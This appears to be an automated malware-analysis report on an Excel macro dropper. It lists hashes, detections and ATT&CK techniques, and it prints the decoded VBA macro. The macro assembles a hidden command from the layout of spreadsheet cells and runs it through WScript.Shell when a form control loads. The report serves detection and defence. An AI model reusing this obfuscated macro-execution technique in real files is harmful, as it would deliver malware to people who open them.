Xls.Dropper.Agent-8810704-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 c898e064e2030566…

MALICIOUS

Office (OOXML)

35.3 KB Created: 2020-07-13 11:16:32 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-15
MD5: 3387406ff10f4b2eddf8736429265604 SHA-1: f996ae36d7c2d8b98e1a5174c2a31c86b77a2b38 SHA-256: c898e064e2030566e29594c3ef3cbe6720304861fb0126dfed0477de444d63c4
240 Risk Score

Malware Insights

Xls.Dropper.Agent-8810704-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel document containing VBA macros that leverage WScript.Shell to execute a command. The script attempts to construct a command string by concatenating characters derived from cell values, which is then executed. This behavior is indicative of a dropper that downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Xls.Dropper.Agent-8810704-0'. The use of WScript.Shell and the execution of an arbitrary command are key indicators.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-8810704-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8810704-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    On Error Resume Next
    Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
    ActiveWorkbook.Close False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    On Error Resume Next
    Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
    ActiveWorkbook.Close False

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1058 bytes
SHA-256: 4d85480660effb9e19d036c20741c00162241852d175c48484056d348568aafa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "A, 1, 0, MSForms, Frame"
Private Sub A_Layout()
Dim c(2398)
For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
c(Ee.value) = Chr(Ee.Row)
Next
For Each k In c
fig = fig + k
Next
On Error Resume Next
Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
ActiveWorkbook.Close False
End Sub
Sub lets()
MsgBox "": h = 12
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10752 bytes
SHA-256: e3e17661a75445ffd10c6364258e1bbcd96fac6ebdc46c5199b7ca1c0cc54a82
Detection
ClamAV: Xls.Dropper.Agent-8810704-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2024 bytes
SHA-256: 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5